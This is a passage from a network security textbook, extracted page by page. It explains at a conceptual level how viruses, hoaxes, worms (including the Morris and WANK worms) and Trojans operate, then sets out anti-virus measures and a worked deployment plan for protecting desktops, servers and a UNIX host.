virus is to include hooks into an object module known as a \nmutation engine. Because this engine is modular, it can easily be added to any existing virus code. The mutation \nengine includes a random-number generator, which helps to scramble the resulting ciphertext even further. Since a \nrandom-number generator is used, the resulting ciphertext becomes unpredictable and will vary with every file \ninfected. This can make the virus nearly impossible to detect, even for other instances of the virus itself. \nBomb \nOur virus has successfully replicated itself and avoided detection. The question now becomes, “What will the \nvirus do next?” Most viruses are programmed to wait for a specific event. This can be almost anything—including \nthe arrival of a specific date, the infection of a specific number of files, or even the detection of a predetermined \nactivity. \nOnce this event has occurred, the true purpose of the virus becomes evident. This might be as benign as playing a \ntune through the computer’s speakers, or as destructive as completely wiping out all the information that has been \nstored on the computer’s hard drive. \nMost bombs can perform a malicious task because the current DOS and Windows environments provide no clear \ncontainment between the operating system and the programs they run. A virus can have direct access to lower-\nlevel functions. This functionality is provided because the operating system expects programs to be trustworthy. \n" }, { "page_number": 224, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 224\nFor example, DOS and Windows applications are allowed to directly address memory and the interrupt table. \nWhile this can help to boost an application’s performance by allowing it to circumvent the operating system, it \nalso provides much of the functionality required for a virus to utilize stealth. \nThere are limits to what a bomb can do, however. While a bomb can render a computer unusable, it cannot cause \nphysical damage to any of the components. This means that in a worst-case scenario you can always completely \nwipe out all the data on a computer and start from scratch. Not exactly the first option you would want to hear—\nbut at least you know your hardware will remain intact and functional once the virus is eliminated. \nHoaxes \nSometimes referred to as a socially engineered viruses, hoaxes can be just as troublesome as the real thing. Social \nengineering viruses meet all the criteria of a normal virus, except they rely on people to spread the infection, not a \ncomputer. A good example of a social engineering virus is the Good Times virus hoax that has circulated the \nInternet for many years. This e-mail message announces that a dangerous virus is being circulated via e-mail and \nhas the ability to wipe out all the files on your computer. This message even claims that the virus’s existence has \nbeen confirmed by AOL (who we all know is the world’s authority on viruses). People concerned that their friends \nmay be attacked by this virus would then forward the hoax to every person in their address books. How does a \nsocial engineering virus meet the criteria that define a true virus? \nReplication These viruses rely on two human traits in order to replicate themselves to other \nsystems: good intentions and gullibility. Since it is human nature to help others, we are more than \nhappy to circulate what appear to be virus warnings, e-mail requests from dying children, and the \nlike, to other computer users. Since it is also human nature to believe what we read—and perhaps to \nbe a bit too lazy to verify information—we might forward the virus along without verification. \nConcealment In order to conceal the threat, the virus will use language that makes the message \nbelievable to the average user. For example, the message may claim that a company like AOL, \nIBM, or Microsoft has verified the existence of the virus mentioned in the alert. Since these are \ncomputer-related companies familiar to the average user, the message appears to be authoritative. \nBomb This is the part of social engineering viruses that most people do not even think about. The \n“bomb” is wasted bandwidth, as well as unnecessary fear. Since the message is a hoax, bandwidth \nis wasted every time it is circulated. Since the sender has assumed a sense of urgency with the \nmessage, the virus is typically sent out en masse. Unnecessary fear comes into play as the message \nusually includes a warning of disaster if it is ignored (for example, the user’s computer becomes \ninfected by the hoax virus or the child with cancer dies because she did not receive enough e-mail to \npay for her treatment). This fear will manifest itself as additional stress and worry. Thus the bomb is \nhow these e-mails affect both computer resources and their human operators. \nNo virus scanner can detect social engineering viruses. Only education and verifying information can keep these \nviruses from spreading. \nNote \nA wonderful resource for social engineering viruses is the Computer Virus Myths home \npage located at www.vmyths.com. \n \nWorms \nA computer worm is an application that can replicate itself via a permanent or dial-up network connection. Unlike \na virus, which seeds itself within the computer’s hard disk or file system, a worm is a self-supporting program. A \ntypical worm will only maintain a functional copy of itself in active memory; it will not even write itself to disk. \nThere are actually two different strains of computer worms. The first will operate on only a single computer, just \nlike a typical application. The worm will only use the system’s network connection as a communication channel in \norder to replicate itself to additional systems or to relay information. Depending on the worm design, it may or \nmay not leave a copy of itself running on the initial system once it replicates to a new host. \n" }, { "page_number": 225, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 225\nThe second strain of computer worm actually uses the network connection as a nervous system so that it may have \ndifferent segments of its code running on multiple systems. When there is a central node coordinating the effort of \nall these segments (a sort of “brain”), the worm is referred to as an octopus. \nNote \nThe name worm is derived from a 1975 story by John Brunner called “The Shockwave \nRider.” The story’s hero uses a program called a “tapeworm” in order to destroy the \ntotalitarian government’s computer network. This destruction removes the government’s \npower base, thus freeing the people under its control. Before the publication of this story, \nthere was no universally agreed-upon name to describe these programs (life imitating art, \nso to speak). \nThe Vampire Worm \nWorms have not always been considered a bad thing. In the 1980s John Shock and Jon Hepps of Xerox were \ndoing some wonderful worm research in order to show just how beneficial these programs could be. To this end, \nthey created a number of worm programs and used them for administration on Xerox’s network. \nThe most effective was the vampire worm. This worm would sit idle during the day when system utilization was \nhigh. At night, however, the worm would wake up and use idle CPU time in order to complete complex and highly \nprocessor-intensive tasks. The next morning the vampire worm would save its work and go back to sleep. \nThe vampire worm was extremely effective until the day that Xerox employees came into work and found that all \nthe computer systems had crashed from a malfunctioning process. When the systems were restarted, they were \nimmediately crashed by the worm. This led to the worm’s removal from all of the network’s systems and an end to \nfurther testing. \nThe Great Internet Worm \nWorms received little attention until November 3, 1988. This was the day after the great Internet worm had been \nreleased onto the Internet. In less than six hours, this 99-line program had effectively crippled all of the 6,000 Sun \nand VAX systems connected to the Internet. \nThe program was written by Robert Morris, the son of one of the country’s highest-ranking security experts at that \ntime. It has been suggested that the writing of the worm was not a malicious act, but the effort of a son to break \nout from his father’s shadow. This thinking is supported by the actual worm code, as the program does not \nperform any intentionally destructive functions. \nWhat the worm did do was to start a small process running in the background of every machine it encountered. \nThis experiment would have probably gone completely unnoticed—except for one minor programming flaw. \nBefore infecting a host, the worm did not perform a check to see if the system was already infected. This led to the \nmultiple infection of systems. While one instance of the worm created little processor load, dozens—or possibly \nhundreds—of instances would bring the system to its knees. \nAdministrators found themselves in a losing battle. As a system was cleaned and restarted, it would again become \nquickly infected. When it was discovered that the worm was using Sendmail vulnerabilities in order to move from \nsystem to system, many administrators reacted by disconnecting from the Internet or by shutting down their mail \nsystems. This probably did more harm than good, because it effectively isolated the site from updated information \non the worm—including information on how to prevent infection. \nFrom all the chaos that ensued from this incident, many good things did arise. It took an episode of this magnitude \nto change people’s thinking regarding system vulnerabilities. At the time, such vulnerabilities were simply \nconsidered minor bugs. The Internet worm incident pushed these deficiencies into a class of their own. This \nincident spawned the creation of the Computer Emergency Response Team (CERT), an organization that is \nresponsible for documenting, and helping to resolve, computer-related security problems. \nThe WANK Worm \nWhile the Internet worm is probably the best known, it was certainly not the worst worm ever encountered. In \nOctober 1989, the WANK (Worms Against Nuclear Killers) worm was released on unsuspecting systems. While \nhighly destructive, this worm was unique in that it only infected DEC systems and only used the DECnet protocol \n(it was not spread via IP). This worm would \nƒ \nSend e-mail (presumably to the worm’s creator) identifying which systems it penetrated \nalong with the logon names and passwords used \nƒ \nChange passwords on existing accounts \n" }, { "page_number": 226, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 226\nƒ \nLeave additional trapdoor access into the system \nƒ \nFind users on random nodes and ring them using the phone utility \nƒ \nInfect local COM files so that the worm could reactivate later if it was cleaned from the \nsystem \nƒ \nChange the announcement banner to indicate the system had been “WANKed” \nƒ \nModify the logon script to make it appear that all of a user’s files were being deleted \nƒ \nHide the user’s files after logon so the user would be convinced that the files had been \ndeleted \nAs you can imagine, this worm ruined more than one system administrator’s day. It took quite some time to \nsuccessfully purge this worm from all the infected systems. \nIRC Worms \nHostile worms exist even today One of the more common types are IRC (Internet Relay Chat) worms. These \nworms affect all users running mIRC communication software. When a user joins a specific IRC channel, the \nworm infects the user’s system. It then sits quiet and waits for one of the IRC channel participants to issue a \nrecognized keyword. \nEach keyword is designed to elicit some form of specific action. For example, one keyword is designed for victims \nrunning UNIX. When the keyword is issued, the worm sends a copy of the local password file to the IRC user who \nissued the command (using mIRC’s DCC command). Another keyword is designed for Windows 95/98 users and \ndelivers a copy of the Registry. Still another gives the person issuing the command full read and write access to \nthe local hard drives of all infected systems. \nMacro Worms \nSimilar to macro viruses, macro worms use VBA and Microsoft applications as their executing environment. A \nmacro worm typically spreads by sending a copy of itself as an innocuously (but appealingly) named attachment to \nevery e-mail address stored in Outlook or Outlook Express. The worm depends on social engineering, (naming the \nattachment “I Love You,” for example), and the default configuration in Outlook (which hides the filename \nextensions of attachments) to induce the recipient to execute the worm. Because of the success of these worms, \n(including the infamous I Love You worm), some programmers have created hybrid programs that are really more \nvirus than worm, deleting files and causing other operating system mischief. \n \nTrojan Horses \nA Trojan horse, as the name implies, is an application that hides a nasty surprise within an innocuous or pleasant \npackage. The surprise is a process or function, specifically added by the Trojan horse’s programmer, that performs \nan activity that the user is unaware of—and would probably not approve of. The visible application may or may \nnot do anything that is actually useful. The hidden application is what makes the program a Trojan horse. \nWhy Trojan Horses Are Not Viruses \nTrojan horses (or “Trojans” for short) differ from viruses in that they do not replicate or attach themselves to other \nfiles. A Trojan is a stand-alone application that had its bomb included from the original source code. It does not \nbecome malicious due to the effects of another application. \nFor example, there are a number of UNIX Trojans that are made to replace existing network applications. An \nattacker may replace the telnet server process (telnetd) with one of his own creation. While the program will \nfunction identically to the standard telnetd program, it will quietly record all logon names and passwords that \nauthenticate to the system. Conversely, an attacker could also replace the telnet client application, giving himself \nvalid account information on remote systems. This would allow him to systematically penetrate every server on a \nnetwork. \nAttackers have also created Trojans designed to be immediately destructive. For example, in April 1997, many \npeople fell prey to the AOL4FREE.COM Trojan. While users thought they had found a utility that would give \nthem a free account on AOL, what they actually received was a wonderful tool for removing all those pesky files \n" }, { "page_number": 227, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 227\non a system’s local hard drive. As soon as the program was launched, it would permanently delete all files located \non the C: drive. \nThe most successful (hence common) Trojan attack targets users who run Windows 95/98 or Windows NT/2000 \nDial-Up Networking. This Trojan has been programmed into a number of helpful utilities that are designed to \nentice the user to download them. When the utility is installed, the Trojan enumerates the user’s phone book and \ngrabs a copy of the Windows Dial-Up Networking cache. It then uses a number of Windows API calls in order to \ne-mail this information to the Trojan’s author. Besides potentially yielding access to the local system, the attacker \nnow has valid ISP account information to use in order to attack other systems. \nDid I Just Purchase a Trojan Horse? \nOf course, not all Trojans have been written by true attackers. For example, some users were extremely surprised \nto find out that when they joined the Microsoft Network, the software made a complete inventory of system \nhardware and software. This included Microsoft software and competitors’ products. When the user connected to \nthe network, this information was automatically forwarded to Microsoft, which could collect marketing data and \ncheck for proper product licensing. While Microsoft claimed that this information was being collected for \ntechnical support use only, many people considered it to be a clear invasion of privacy. \nThere are many other situations in which vendors add functionality at the expense of breaching a customer’s \nsecurity posture. For example, in May 1998, it was made public knowledge that 3COM, as well as a number of \nother network hardware vendors, were including “back door” accounts for access into their switch and router \nproducts. These undocumented accounts are typically invisible to the end user and cannot be deleted or disabled. \nWhile vendors again claimed they had created these back doors for technical support reasons (in case an \nadministrator forgets a password, for example), it still leaves the product horribly exposed and the administrator \nwoefully uninformed. \nSuch activities exist in a gray area between technical support and Trojans. While these undocumented back doors \nare being added by reputable vendors, they compromise security and fail to make the customer aware of potential \nexposure. Clearly, back-door access is a feature that many administrators would like to disable—but they have to \nlearn of its existence first. \nPreventive Measures \nNow that you have seen the implications of these rogue programs, what can you do about them? The only \nfoolproof way to identify a malicious program is to have a knowledgeable programmer review the source code. \nSince most applications are already in an executable format, this would require a step back to reverse engineer \nevery file on the system. Obviously, doing so is too time-consuming and expensive to be a feasible option for the \ntypical organization. \nWith this in mind, any other preventive measures will fall short of being 100 percent effective. You are faced with \nperforming a risk analysis in order to determine just how much protection you actually require. There are many \ndifferent techniques that you can employ in order to prevent infection. Each has its strengths and weaknesses, so a \ncombination of three or more techniques is usually best. \nAccess Control \nEstablishing an access control policy is not only a good security measure; it can help to prevent the spread of \nrogue programs, as well. Access control should not be confused with file attributes (such as read-only or system), \nwhich can easily be changed by an infecting program. True access needs to be managed through a multi-user \noperating system that allows the system administrator to set up file permission levels on a user-by-user basis. \nAccess control will not remove or even detect the existence of a rogue program. It is simply one method of helping \nyour systems to resist infection. For example, most viruses count on the infected machine having full access to all \nfiles (such as the default permissions under Windows NT). If a savvy system administrator has modified these \ndefault permissions so that users only have read access to their required executables, a virus will be unable to \ninfect these files. \nNote \nThis will not work for all executables, however. Some actually require that they modify \nthemselves during execution. Users need write access to these executables, and you can \nexpect the time and date stamps to change on a regular basis. How do you know which \nexecutables require write access? Usually you don’t. It’s a matter of trial and error to see \nwhich executables change their date and time stamps or break when write access is not \nprovided. These self-writing executables are rare, however. You should not run into them \nvery often. \n" }, { "page_number": 228, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 228\nChecksum Verification \nA checksum, or Cyclic Redundancy Check (CRC), is a mathematical verification of the data within a file. This \nallows the contents of the file to be expressed as a numeric quantity. If a single byte of data within the file \nchanges, the checksum value changes, as well, even if the file size remains constant. Typically, a baseline is first \ncreated of a non-infected system. The CRC is then performed at regular intervals in order to look for file changes. \nThere are a couple of drawbacks to this method. First, a CRC cannot actually detect file infection; it can only look \nfor changes. This means that self-writing executables would fail the checksum verification on a regular basis. \nAlso, even if the change is actually due to a virus, a CRC has no way of cleaning the file. Finally, many viruses \nhave been specifically written to fool a CRC into thinking that the file information has not changed. \nTip \nWhile a CRC is a not the most effective check against viruses, it can be a big help in \ndiscovering Trojan horse replacements. A Trojan designed to replace an existing \nauthentication service (such as telnet or FTP client and server software) does not simply \nmodify the existing files; it replaces them. This file replacement would be flagged and \nreported by a checksum verification. A virus scanner, however, would completely miss this \nproblem, provided that the files did not include any virus-like code. This makes the CRC far \nmore effective at identifying Trojans. \nProcess Monitoring \nAnother method of preventing rogue programs from taking hold of a system is process monitoring. Process \nmonitoring observes different system activity and intercepts anything that looks suspicious. For example, the \nBIOS in most modern desktop computers contains an anti-virus setting. When enabled, this setting allows the \ncomputer to intercept all write attempts to the master boot record. If a boot sector virus attempts to save itself to \nthis area, the BIOS will interrupt the request and prompt the user for approval. \nAgain, there are a few problems. The first is that viruses and normal programs share a lot of similar attributes: it \ncan be extremely difficult to distinguish between the two. For example, running the FDISK utility will also trigger \nthe BIOS virus warning just described. Even though FDISK is not a virus (unless you subscribe to the school of \nthought that all Microsoft programs are viruses), it will still trigger the warning because its activity is considered \nsuspicious. This is referred to as a false positive— the BIOS thinks it has detected a virus when in fact it has not. \nThis brings us to the second problem with process monitoring, which is the requirement of user intervention and \nproficiency. For example, a user who receives the false positive just mentioned must be computer savvy enough to \nrealize that a true virus was not actually detected, but that the normal operation of FDISK set off the alarm. \nThen again, maybe there is in fact a boot sector virus on the floppy disk where FDISK is stored. This could cause \nthe user to assume that a false positive has been reported when in fact there is an actual virus. While this would \ntrigger the BIOS virus alert at a different point in the process (when FDISK is loaded rather than when FDISK is \nclosed), the end user needs a high level of skill and computer proficiency just to identify virus problems \naccurately. \nThe problem of correctly distinguishing between a virus and a normal application becomes even more apparent \nwhen you start trying to monitor other types of activity. Should file deletions be considered suspicious? Certainly \na file maintenance utility will be used to delete files from time to time, generating frequent false positives. The \nsame would be true for attempting to monitor file changes, memory swapping, and so on. All of these activities \nmay be performed by a virus—but they may also be performed by a normal application. \nAbout the only useful process monitoring is the BIOS virus warning described earlier. While there is the potential \nfor false positive warnings, it is actually pretty rare for a user to be running FDISK or some other application that \nwill legitimately attempt to write to the boot sector. Typically, this will only occur if the user is installing a new \noperating system. This means that the frequency of false positives would be minimal. \nVirus Scanners \nThe most popular method of detecting viruses is through the use of virus-scanning software. Virus scanners use \nsignature files in order to locate viruses within infected files. A signature file is simply a database that lists all \nknown viruses, along with their specific attributes. These attributes include samples of each virus’s code, the type \nof files it infects, and any other information that might be helpful in locating the virus. By using a separate file to \nstore this information, you can update your software to detect the latest viruses by replacing this single file. You \ndo not have to update the entire program. This is useful because many new viruses are detected each month. \nWhen a scanner checks a file, it looks to see if any of the code within the file matches any of the entries within the \nsignature file. When a match is found, the user is notified that a virus has been detected. Most scanners are then \ncapable of running a separate process that can clean the virus, as well. \nThe biggest limitation of virus scanners is that they can only detect known viruses. If you happen to run across a \nnewly created virus, a scanner may very well miss it. This is a particularly nasty problem when you are dealing \n" }, { "page_number": 229, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 229\nwith a polymorphic virus. As mentioned in “Polymorphic Mutation” earlier in this chapter, polymorphic viruses \nare capable of changing their signature with each infection. In order for a virus scanner to be 100 percent effective \nagainst this type of virus, it must have a signature file that lists all possible polymorphic permutations. If even one \npermutation is missed, the virus scanner may fail to clean an infected file—and the virus can again infect the \nsystem. \nTip \nWhen selecting a virus scanner, look for one that not only has the capability of detecting \nmany different viruses, but many different polymorphic strains, as well. \nCompressed or encrypted files can also cause problems for a virus scanner. Since both of these processes \nrearrange the way information is stored, a virus scanner may be unable to detect a virus hidden within the file. \nFor example, let’s say you use PKZIP to compress a number of files in order to transport them on a floppy disk. \nYou then use a virus scanner to check the disk in order to verify that none of the compressed files contains a virus. \nUnless the virus scanner you are using understands the ZIP file format (many do not), it would be unable to detect \na virus hidden within one of the files. \nThis is even more of a problem with encrypted files. Since a virus scanner has no way to decrypt a manually \nencrypted file, it will most likely miss any viruses that are present. You must first decrypt the file, and then \nperform a virus scan, in order to insure that no viruses are present. \nVirus Scanner Variations \nThere are two basic types of virus scanners: \nƒ \nOn demand \nƒ \nMemory resident \nOn-demand scanners must be initialized through some manual or automatic process. When an on-demand scanner \nis started, it will typically search an entire drive or system for viruses. This includes RAM memory and storage \ndevices such as a hard drive or a floppy disk. \nMemory-resident virus scanners are programs that run in the background of a system. They are typically \ninitialized at system startup and stay active at all times. Whenever a file is accessed, a memory-resident scanner \nwill intercept the file call and verify that no viruses are present before allowing the file to be loaded into memory. \nEach of these methods has its trade-offs. On-demand scanners work after the fact. Unless you always initialize the \nscanner before accessing any file (an unlikely occurrence unless you are very meticulous or very bored), your \nsystem will contract a virus before it is detected. While a memory-resident virus scanner is capable of catching a \nvirus before it infects your system, it does so with a cost in performance. Every file scanned will degrade the \nsystem’s file access speed, thus slowing down the responsiveness of the system. \nThe manufacturers of memory-resident virus scanners are well aware that file access speed is important and \nrecognize that many users would opt to disable the scanner rather than take a large performance hit. For this \nreason, many memory-resident scanners are not quite as thorough as their on-demand counterparts. Better \nperformance can be achieved by only checking for the most likely virus signatures, or by only scanning files that \nare the most likely to become infected (such as COM files). \nTip \nA good security posture will include the use of both on-demand and memory-resident virus \nscanners. \nProblems with Large Environments \nAll virus scanner vendors periodically release updated signature files to insure that their products can detect as \nmany known viruses as possible. Updating signature files can create a great deal of extra work for system \nadministrators who are responsible for large networking environments. If you are running DOS, Windows, or \nMacintosh operating systems on the desktop, you will most likely have signature files on each of these systems \nthat will need updating. \nMany vendors have taken steps to rectify this problem. For example, Intel’s LANDesk Virus Protect uses the \nconcept of virus domains in order to group multiple servers and desktop machines. The network administrator can \nthen update signature files, view alerts, and even control scanning parameters from a single console screen. This \ncan dramatically reduce the amount of work required to administer virus protection in a large-scale environment. \nA scaleable virus protection solution will not only reduce overall costs, it will help to insure that your environment \nremains well protected. As mentioned, virus scanning vendors periodically release updated signature files. These \nsignature files are of little use, however, if they are not installed on every system that requires them. A scaleable \nsolution will provide a simple method of distributing these signature files to all systems that require them. A solid \nenterprise solution will also include some form of advanced alerting function so that the network administrator \nwill be notified of all viruses detected on any system on the network. \n" }, { "page_number": 230, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 230\nHeuristic Scanners \nHeuristic scanners perform a statistical analysis in order to determine the likelihood that a file contains program \ncode that may indicate a virus. A heuristic scanner does not compare code to a signature file like a virus scanner; it \nuses a grading system to determine the probability that the program code being analyzed is a virus. If the program \ncode scores enough points, the heuristic scanner will notify the user that a virus has been detected. Most modern \nvirus scanners include heuristic scanning ability. \nOne of the biggest benefits of heuristic scanners is that they do not require updating. Since files are graded on a \npoint system, no signature files are required for comparison. This means that a heuristic scanner has a good \nprobability of detecting a virus that no one else has ever seen. This can be extremely useful if you find that you are \nunable to update signature files on a regular basis. \nThe biggest drawback to heuristic scanners is their tendency to report false positives. As mentioned, virus code is \nnot all that different from regular program code. This can make it extremely difficult to distinguish between the \ntwo. As system administrator, you may find yourself chasing your tail if you deploy a poor heuristic scanner that \nhas a tendency toward reporting nonexistent viruses. \nApplication-Level Virus Scanners \nApplication-level virus scanners are a new breed in virus protection. Instead of being responsible for securing a \nspecific system from viruses, an application-level virus scanner is responsible for securing a specific service \nthroughout an organization. \nFor example, e-mail makes a wonderful transport for propagating viruses through file attachments. Trend Micro \nmanufactures a product called InterScan VirusWall, which can act as an SMTP relay with a twist. Instead of \nsimply receiving inbound mail and forwarding it to the appropriate mail system, InterScan VirusWall can perform \na full virus scan of all attachments before relaying them to an internal mail host. \nAlong with scanning SMTP traffic, InterScan VirusWall can scan FTP and HTTP traffic. This includes raw files, \nas well as many archive formats such as PKZIP. This helps to insure that all files received from the Internet are \nfree of malicious viruses. \nTip \nMany vendors now make products that will directly integrate with existing firewall \nproducts. For example, Cheyenne Software makes a virus scanning plug-in for Check \nPoint’s FireWall-1 product. This allows virus scanning to be managed on the same system \nthat is responsible for network security. This gives the network administrator a single point \nof management for both security and virus protection. \n \nDeploying Virus Protection \nNow that you have a good idea of how viruses work and what tools are available to prevent infection, let’s take a \nlook at some deployment methods to safeguard your network. \nNote \nThese suggestions should only be considered a guide; feel free to make modifications that \nbetter fit your specific needs. \nLook at the network diagram shown in Figure 11.1. It shows a mixed environment that uses a number of different \nserver operating systems. The desktop environment utilizes a mixture of operating systems, as well. Let’s assume \nthat you are consulting for the organization that owns this environment and you have been charged with protecting \nit from viruses, as well as Trojans and worms. You have also been asked to perform this task with a minimal \nimpact on network performance. Take a moment to study the diagram and consider what recommendations you \nwould make. \n \nFigure 11.1: Sample network requiring virus protection \n" }, { "page_number": 231, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 231\nProtecting the Desktop Systems \nWhile the desktop environment uses a mixture of operating systems, the hardware platform is consistent (PC \ncompatible). This means that all desktop systems will be susceptible to many of the same types of viruses. You \nshould try to standardize your desktop suggestions as much as possible, despite the fact that there are multiple \noperating systems in use. \nEnable BIOS Boot Sector Protection \nOne of the most cost-effective suggestions you could make would be to enable boot sector protection through the \nsystems’ BIOS. This is a quick yet effective way to insure that the boot sectors of all systems remain secure. You \nwould want to follow this up with some end-user education about what the boot sector warning means and how \nusers should respond to it. Unless a user tries to upgrade his or her operating system, false-positive warnings \nshould not be a problem. \nOn-Demand Scanning \nEach desktop system should utilize an on-demand scanner configured to perform a full virus check of all local \ndrives on a regular basis. This check could be scheduled to run nightly if desktop systems are typically left \npowered up at night. If nightly virus scans are not an option, scans could be run during some other period of \ninactivity (such as lunchtime) or weekly as part of a server logon script. \nIt is important that the on-demand scanner check all local files to insure that a virus has not been planted through a \ndropper or sneaked in through some file with an obscure file extension. A proper on-demand scanner should \ninclude heuristic scanning capability, as well. There should also be some method of reporting all scanning results \nto a central location so that the data can be reviewed by a system administrator. \nMemory-Resident Scanning \nEach desktop should also launch a memory-resident scanner during system initialization to weed out viruses \nbefore they can be stored on the local file system or executed in memory. In the interest of performance, you may \nwish to tweak which files are checked by the memory-resident scanner. \nSince you will be performing a regular on-demand scan of each desktop system, you have a bit of leeway in how \nmeticulous you need to be in verifying files with your memory-resident scanner. By only checking files that are \nmost commonly infected by viruses, you can reduce the impact of the memory-resident scanner on system \nperformance. While this diminishes your security posture a bit, the gain in system performance may be worth the \nslightly higher risk. \nYour memory-resident scanner should check \nƒ \nFile reads only \nƒ \nWorms \nƒ \nExecutable files such as COM and EXE files \nƒ \nMacro-enabled documents, such as Microsoft Word and Excel \nYou want to check file reads—but not writes, because checking files that are written to disk would be redundant. \nIf a scanner failed to find a virus when the file was read into memory, it is extremely unlikely that the same \nscanner will detect the virus when it is written to disk. You also want to check for worms because many do not \nsave any information to disk; thus they may go undetected by an on-demand scanner. Finally, you want to \nconfigure your memory-resident scanner to check the files most likely to become infected. This includes \nexecutable files, as well as files that are capable of saving macro commands. \nOptions Not Considered \nI did not mention setting file attributes or checksum verification because, as you saw earlier, these methods are \nineffectual against many strains of viruses. I did not mention other types of process monitoring (besides the BIOS \nboot sector warning) for the same reason. The suggestions are designed to provide the greatest level of protection \nwith the least amount of labor. \n" }, { "page_number": 232, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 232\nOne additional option, however, is to use the file permissions on the NT/2000 workstation in order to prevent the \nuser from having write access to any executable files. While this would decrease the chances of virus infection on \nthese systems, it would also break from the standard configuration used on the other desktop machines. Since DOS \nand Windows 95/98/Me are not true multi-user operating systems, there is no way to restrict local user access to \nselective parts of the file system. This means that the NT/2000 workstation configuration would differ from the \nother desktop machines. \nAlso, this option does not address the macro viruses, which are the most common forms of virus found in the wild. \nThese viruses hide within document files. Users must have write access to their document storage folders in order \nto save their files. With this in mind, this option may cause more problems than it solves. \nProtecting the NT and NetWare Servers \nSince the NT/2000 and NetWare servers are shared resources, they require a slightly different method of \nprotection from the desktop machines. Virus protection on these systems is far more critical, as they can be used as \na transport for propagating viruses between the desktop machines. In the case of the NT/2000 server, it can not \nonly be a transport; it can even become infected itself, as well. \nOn-Demand Scanning \nAs with the desktop systems, configure on-demand to perform a full scan of all files on a nightly basis. Most \nserver-based virus scanning products include a scheduler for just this purpose. If nightly backups are performed, \nthe on-demand scanner should be set to scan the file system before performing the backup operation. This insures \nthat all archived files are virus-free. \nMemory-Resident Scanning \nMemory-resident software designed for Windows NT will check the server’s memory and files stored to the local \nfile system. Memory-resident scanning operates in a slightly different fashion, however, when run from a NetWare \nserver. This is because the server is incapable of running standard executables. Since the system is simply used for \nfile storage, memory does not need to be checked. It is inbound network traffic that we are most concerned with \nscanning. \nYour server-based memory resident scanner should check \nƒ \nLocal memory for worms and Trojans (NT only) \nƒ \nInbound executable files from the network \nƒ \nInbound macro-enabled documents from the network \nAs with the desktop machines, this minimal file checking is done in the interest of improving performance. On the \noff chance that a virus sneaks through, you would expect the nightly on-demand virus scan to catch it. \nTip \nYou can gain some additional benefits by using products from different vendors to secure \neach part of your network from viruses. For example, you could use a product from one \nvendor on the servers and another on the desktop machines. This is because no two \nvendors’ signature files are identical. By mixing and matching products, you can receive the \nmaximum amount of virus protection. \nFile Permissions \nAs mentioned earlier in this chapter, setting user-level file permissions insures that executable files do not become \ninfected. The benefits of this configuration will depend greatly on how applications are stored on the network. If \nall applications are stored on the local workstation, there will be no executables on the server to protect by setting \nread-only user-level access. If, however, all applications are launched from one or both of the servers, you can \ndecrease the likelihood of virus infection by setting the minimum level of required permissions. \nOptions Not Considered \nNeither process monitoring nor checksum verification was suggested, because both of these methods are less \neffective than running virus scanning software. Remember that the objective is to provide the greatest amount of \nprotection while creating the least amount of administrative maintenance. The suggestions made achieve that goal. \n" }, { "page_number": 233, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 233\nProtecting the UNIX System \nOne important piece of information is missing: what exactly is the UNIX system used for? You have not been told \nif it is a simple mail relay or a full-blown server accepting a full array of Intranet services. The answer to this \nquestion could greatly affect your recommendation. For the purpose of this example, let’s assume that this is an \nengineering system used to compile C code. Users connect to the system via telnet and FTP. \nTip \nAlways make sure you have enough information to make an informed and logical decision! \nFile Integrity Checking \nOne of your biggest concerns with the UNIX system should be the possibility that someone will attempt to load a \nTrojan on the system in order to capture authentication information. By replacing the telnet server with one of her \nown creation, an attacker could record logon information from every user who authenticates with the system. \nThe easiest way to detect this type of activity is to perform a regular file integrity check. This should include a \nCRC checksum so that changes can be detected even if the current file has the same size and time stamp. You \nshould verify the telnet and FTP servers, as well as any other process that accepts inbound connections. This check \nshould be run as an automated process with the results being analyzed on a different machine. By analyzing the \nresults on a different machine, you are less likely to have the results altered by someone who has compromised the \nsystem. \nProcess Monitoring \nAnother concern with the UNIX machine is that someone may infiltrate the system with a worm. This would show \nup as a new process running on the system. As with the integrity check, you should automate this audit and \nanalyze the results on a separate system. By knowing what should be running on the system, you can take action if \na new process appears. \nFile Permissions \nBy default, only the root user can overwrite software that runs as a server on the system. This means that an \nattacker would first need to crack the root account or perform a root-level exploit before he could replace any of \nthe server software. This level of file access should be maintained in order to reduce the chance of a system \ncompromise. Regular user accounts should not be granted write access to these files. \nOptions Not Considered \nWhat about virus-scanning software? UNIX-compatible viruses are extremely rare. Given the described use of this \nparticular system, it is extremely unlikely that a virus infection will occur. Your greater concern is with Trojans \nand worms. \n \nSummary \nIn this chapter, we discussed the differences between viruses, Trojans, and worms and how \neach of them can affect an infected system. You saw what preventive measures are available \nand the effectiveness of each. You also looked at a mixed-network environment and \nconsidered how best to go about protecting it from infection. \nIn the next chapter, you will learn about backups and disaster recovery. These provide your \nlast line of defense when catastrophic failures occur. From a security perspective, it is always \nbest to plan for the worst. \n \nChapter 12: Disaster Prevention and Recovery \nDisaster prevention is defined as the precautionary steps you take to insure that any disruption of \nyour organization’s resources does not affect your day-to-day operations. Think of disaster \n" }, { "page_number": 234, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 234\nprevention as being like insurance: in each case, you invest money in case you may need it—but \nyou hope you never will. \nDisaster recovery is all about contingency planning. Despite all the preparations that go into \ninsuring that the worst never happens, you need to have a backup plan that determines what you \nwill do when disaster becomes reality. This is your last line of defense between recovery and \ncomplete failure. \nIn Chapter 2, we discussed risk analysis and the importance of identifying your critical resources. \nWe also stressed placing a dollar value on resource unavailability in order to determine just how \nmuch downtime you can live with. In this chapter, we will discuss what options are available to you \nin keeping those resources accessible. \nDisaster Categories \nDisaster solutions fall into two categories: \nƒ Maintaining or restoring a service \nƒ Protecting or restoring lost, corrupted, or deleted information \nEach category has its place in guarding your assets, and no disaster solution is complete \nunless it contains elements from both categories. \nFor example, let’s say you have two hard drives installed in a server that are mirrored \ntogether. Mirroring insures that both disks always contain exactly the same information. When \nmirroring is used, a single hard drive failure will not bring down the entire server. The \nremaining hard drive can continue to provide file storage and give users access to previously \nsaved information. Mirroring is considered a disaster recovery 